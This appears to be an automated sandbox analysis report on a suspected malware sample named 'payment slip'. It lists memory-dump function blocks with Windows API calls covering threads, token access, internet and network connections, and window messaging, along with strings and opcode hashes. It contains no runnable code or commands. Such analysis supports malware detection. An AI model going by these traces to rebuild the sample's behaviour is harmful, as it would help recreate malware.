                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        • Opcode ID: 7c7c4a68f1227b3d3aad6f54477b2cdd75e89f8e13a5ac2963d295e62e9a61c9
                                        • Instruction ID: 4b7b9169adb3173e20e4bfb92e158f5289372f4814cffd889db9f22cb01af219
                                        • Opcode Fuzzy Hash: 7c7c4a68f1227b3d3aad6f54477b2cdd75e89f8e13a5ac2963d295e62e9a61c9
                                        • Instruction Fuzzy Hash: 2A110872904254BBEB01DBA8EC05E9E7FADEB45320F144216F924D7691D6B48D0487A0
                                        APIs
                                        • CreateThread.KERNEL32(00000000,?,0005CFF9,00000000,00000004,00000000), ref: 0005D218
                                        • GetLastError.KERNEL32 ref: 0005D224
                                        • __dosmaperr.LIBCMT ref: 0005D22B
                                        • ResumeThread.KERNEL32(00000000), ref: 0005D249
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                        • String ID:
                                        • API String ID: 173952441-0
                                        • Opcode ID: 8b0bc4593a55a820edf05afda329b82aea7912fd7d001a62ca251891b90e5686
                                        • Instruction ID: a61c9d3e100bd9cf857884b26a079c15ce5dbf954d6bd248c091b3bd9a8ef812
                                        • Opcode Fuzzy Hash: 8b0bc4593a55a820edf05afda329b82aea7912fd7d001a62ca251891b90e5686
                                        • Instruction Fuzzy Hash: 2601D276805204BBEB315BA6DC09FAF7AA9DF91332F10021BFD25961D1DB748909C7A0
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                        • GetStockObject.GDI32(00000011), ref: 00036060
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateMessageObjectSendStockWindow
                                        • String ID:
                                        • API String ID: 3970641297-0
                                        • Opcode ID: 023f6f147e3ef56352576afa6e8c9fd92ade55e37cdc71aea0f56c02f7703db8
                                        • Instruction ID: 8e58992780ffa529b7ccd6e83a4580c24e0012c0ab5d92180ad4cfcc8a17ec26
                                        • Opcode Fuzzy Hash: 023f6f147e3ef56352576afa6e8c9fd92ade55e37cdc71aea0f56c02f7703db8
                                        • Instruction Fuzzy Hash: C3115B72501548BFEF264FA4DC55EEBBBADEF093A4F044215FA1892120D736EC609BA0
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00053B56
                                          • Part of subcall function 00053AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00053AD2
                                          • Part of subcall function 00053AA3: ___AdjustPointer.LIBCMT ref: 00053AED
                                        • _UnwindNestedFrames.LIBCMT ref: 00053B6B
                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00053B7C
                                        • CallCatchBlock.LIBVCRUNTIME ref: 00053BA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                        • String ID:
                                        • API String ID: 737400349-0
                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction ID: ccd8080e06b4f5f0c074af5d8e5e2d3cbf6e9601b68b9ebc78007fbe908e5fcf
                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction Fuzzy Hash: FD014C32100148BBDF125E95CC42EEB7FADEF48799F044014FE4896122C732E965DBA0
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000313C6,00000000,00000000,?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue), ref: 000630A5
                                        • GetLastError.KERNEL32(?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue,000D2290,FlsSetValue,00000000,00000364,?,00062E46), ref: 000630B1
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue,000D2290,FlsSetValue,00000000), ref: 000630BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 47b0de6ec336c0a5261cf801cc1356613aa858c7fadec58a55e0ebd4d4ecf9d1
                                        • Instruction ID: da791f5f3d99fc716246a8cef39bd1493f956986c9ad78b99aeda9b1fe2bddbf
                                        • Opcode Fuzzy Hash: 47b0de6ec336c0a5261cf801cc1356613aa858c7fadec58a55e0ebd4d4ecf9d1
                                        • Instruction Fuzzy Hash: 78012B32301222ABFB314BB9EC54E577BDAEF05BA1B100720F909E3140CB35D909C6E0
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0009747F
                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00097497
                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000974AC
                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 000974CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Type$Register$FileLoadModuleNameUser
                                        • String ID:
                                        • API String ID: 1352324309-0
                                        • Opcode ID: 42aa0b5e6e70ea2cc3061012f530c04c45211cec68bc2c6bb921c92df4e11e07
                                        • Instruction ID: 9c5d31441ef7851624e00bd2014e538c4c7f9858a060c3292139efcfb185ecbe
                                        • Opcode Fuzzy Hash: 42aa0b5e6e70ea2cc3061012f530c04c45211cec68bc2c6bb921c92df4e11e07
                                        • Instruction Fuzzy Hash: 2C118BB2215310ABFB308F14DC08F967BFCEB00B00F108569EA1ED6192D7B4E904EBA0
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0C4
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0E9
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0F3
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B126
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 0a3bccea388bffcb1d0153e5fc3544b8e90e51ea062ca56ec4140a7ac2330551
                                        • Instruction ID: e1c38ae4d654d7f73c6dc24b882f6e652acdde96b7718d62ce4d0d0e1b676581
                                        • Opcode Fuzzy Hash: 0a3bccea388bffcb1d0153e5fc3544b8e90e51ea062ca56ec4140a7ac2330551
                                        • Instruction Fuzzy Hash: A011AD70C0062CE7EF10AFE5EA68AEEBF78FF4A321F014095D951B2181CB348A50DB91
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00092DC5
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00092DD6
                                        • GetCurrentThreadId.KERNEL32 ref: 00092DDD
                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00092DE4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: 98ac2d8b5bf19ca6179f735499e8db3bc60afcf33c767f3a656a7700de320dc3
                                        • Instruction ID: d60a6e998a48b001cca3257550be6f3a0831b39b78bd92ee7e69180781427880
                                        • Opcode Fuzzy Hash: 98ac2d8b5bf19ca6179f735499e8db3bc60afcf33c767f3a656a7700de320dc3
                                        • Instruction Fuzzy Hash: 2BE092715022247BFB201B73DC0DFEB3E6CEF43BA5F010015F50AD10809AA8C841D6B0
                                        APIs
                                          • Part of subcall function 00049639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                          • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496A2
                                          • Part of subcall function 00049639: BeginPath.GDI32(?), ref: 000496B9
                                          • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496E2
                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 000C8887
                                        • LineTo.GDI32(?,?,?), ref: 000C8894
                                        • EndPath.GDI32(?), ref: 000C88A4
                                        • StrokePath.GDI32(?), ref: 000C88B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 000498CC
                                        • SetTextColor.GDI32(?,?), ref: 000498D6
                                        • SetBkMode.GDI32(?,00000001), ref: 000498E9
                                        • GetStockObject.GDI32(00000005), ref: 000498F1
                                        Similarity
                                        • API ID: Color$ModeObjectStockText
                                        • String ID:
                                        • API String ID: 4037423528-0
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 00091634
                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,000911D9), ref: 0009163B
                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000911D9), ref: 00091648
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,000911D9), ref: 0009164F
                                        Similarity
                                        • API ID: CurrentOpenProcessThreadToken
                                        • String ID:
                                        • API String ID: 3974789173-0
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 0008D858
                                        • GetDC.USER32(00000000), ref: 0008D862
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0008D882
                                        • ReleaseDC.USER32(?), ref: 0008D8A3
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 0008D86C
                                        • GetDC.USER32(00000000), ref: 0008D876
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0008D882
                                        • ReleaseDC.USER32(?), ref: 0008D8A3
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        APIs
                                          • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 000A4ED4
                                        Strings
                                        Similarity
                                        • API ID: Connection_wcslen
                                        • String ID: *$LPT
                                        • API String ID: 1725874428-3443410124
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 0005E30D
                                        Strings
                                        Similarity
                                        • API ID: ErrorHandling__start
                                        • String ID: pow
                                        • API String ID: 3213639722-2276729525
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 0004F2A2
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0004F2BB
                                        Strings
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 000B57E0
                                        • _wcslen.LIBCMT ref: 000B57EC
                                        Strings
                                        Similarity
                                        • API ID: BuffCharUpper_wcslen
                                        • String ID: CALLARGARRAY
                                        • API String ID: 157775604-1150593374
                                        APIs
                                        • _wcslen.LIBCMT ref: 000AD130
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 000AD13A
                                        Strings
                                        Similarity
                                        • API ID: CrackInternet_wcslen
                                        • String ID: |
                                        • API String ID: 596671847-2343686810
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 000C3621
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 000C365C
                                        Strings
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        • GetParent.USER32(?), ref: 000873A3
                                        • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0008742D
                                        Strings
                                        Similarity
                                        • API ID: LongWindow$ParentProc
                                        • String ID: U
                                        • API String ID: 2181805148-2399391058
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000C327C
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C3287
                                        Strings
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: HANDLE$P
                                        • API String ID: 176396367-3695687902
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateMenuPopup
                                        • String ID: U
                                        • API String ID: 3826294624-2399391058
                                        • Opcode ID: 3a40f77a0fedc5a3bd0b0db8fd41db82f468d8408ac99c7b7ae851b637dc95d0
                                        • Instruction ID: 6330cffe8169eb9095d17e2bb161f137228bc40f7e87cd2def70bc925b12d767
                                        • Opcode Fuzzy Hash: 3a40f77a0fedc5a3bd0b0db8fd41db82f468d8408ac99c7b7ae851b637dc95d0
                                        • Instruction Fuzzy Hash: CB214834608604AFDB61CF28C445FDABBE5FB0A365F08806EE8999B351D331AE42CF51
                                        APIs
                                          • Part of subcall function 0003600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                          • Part of subcall function 0003600E: GetStockObject.GDI32(00000011), ref: 00036060
                                          • Part of subcall function 0003600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                        • GetWindowRect.USER32(00000000,?), ref: 000C377A
                                        • GetSysColor.USER32(00000012), ref: 000C3794
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: abf9131f3e0fdff12ca912671cab7f62f7493b354140f546fb089c2a54c6bec4
                                        • Instruction ID: 0296f7399c0d75493d78f497b1b87ac7fbf57e18e6f41e88972dea700155053f
                                        • Opcode Fuzzy Hash: abf9131f3e0fdff12ca912671cab7f62f7493b354140f546fb089c2a54c6bec4
                                        • Instruction Fuzzy Hash: CA1129B2610209AFEB11DFA8CC46EEE7BF8FB08314F008619F955E2250D775E9519B50
                                        APIs
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000C61FC
                                        • SendMessageW.USER32(?,00000194,00000000,00000000), ref: 000C6225
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: U
                                        • API String ID: 3850602802-2399391058
                                        • Opcode ID: 60dbd06919121168a68c5adb5992daf057fea6f2b884fb90df88ee0c20a6a53d
                                        • Instruction ID: fd7376cd5fe5e6e7a5f0d4eaaef27780c3a86488c11cc761abddb0caf715f126
                                        • Opcode Fuzzy Hash: 60dbd06919121168a68c5adb5992daf057fea6f2b884fb90df88ee0c20a6a53d
                                        • Instruction Fuzzy Hash: 8611C471144614BEEB318F68CD15FFD3BE8EB06315F044119FA169A1E1D3B6DA00DB50
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000ACD7D
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000ACDA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: 3c6e2a43c4da2c98a335d7adbe14452d02315600fb119ef7060be55b7f53b71c
                                        • Instruction ID: edfb406784d3fe2f34ed96261c8450776eb7f4704b909bee274fd1c073034463
                                        • Opcode Fuzzy Hash: 3c6e2a43c4da2c98a335d7adbe14452d02315600fb119ef7060be55b7f53b71c
                                        • Instruction Fuzzy Hash: 0911CE71205636BAF7784BA68C89EF7BEACEF137A4F01422AB11987180D7749840D6F0
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 000C34AB
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 000C34BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: b124ab85a0b504ac2a505de6131e22bff64f8b94b9f9b86f5125f791e2522308
                                        • Instruction ID: 4f606b4f0fcfeba1c65d37d6421f22c3a8b3ee7adb547bda80beec2eae3dd946
                                        • Opcode Fuzzy Hash: b124ab85a0b504ac2a505de6131e22bff64f8b94b9f9b86f5125f791e2522308
                                        • Instruction Fuzzy Hash: B211BC71110208ABEB668F64DC84FEF37AAEB05374F508328FA64931E0C775EC919B60
                                        APIs
                                        • SendMessageW.USER32(?,?,?,?), ref: 000C4FCC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: U
                                        • API String ID: 3850602802-2399391058
                                        • Opcode ID: 7c7a9a8185f07590b35f8dabd9c5407daa212ae5044ff59097d46ae73b8f8171
                                        • Instruction ID: 9eacc7426c48c3d5374c6fcffae2aac19cd1d32d238c22ef1b4fcc6dd2bf649c
                                        • Opcode Fuzzy Hash: 7c7a9a8185f07590b35f8dabd9c5407daa212ae5044ff59097d46ae73b8f8171
                                        • Instruction Fuzzy Hash: 4C21D07AA0011AEFDB15CFA8C950DEE7BB9FB4D340B104158FA05A7320D731E961EBA0
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • CharUpperBuffW.USER32(?,?,?), ref: 00096CB6
                                        • _wcslen.LIBCMT ref: 00096CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: STOP
                                        • API String ID: 1256254125-2411985666
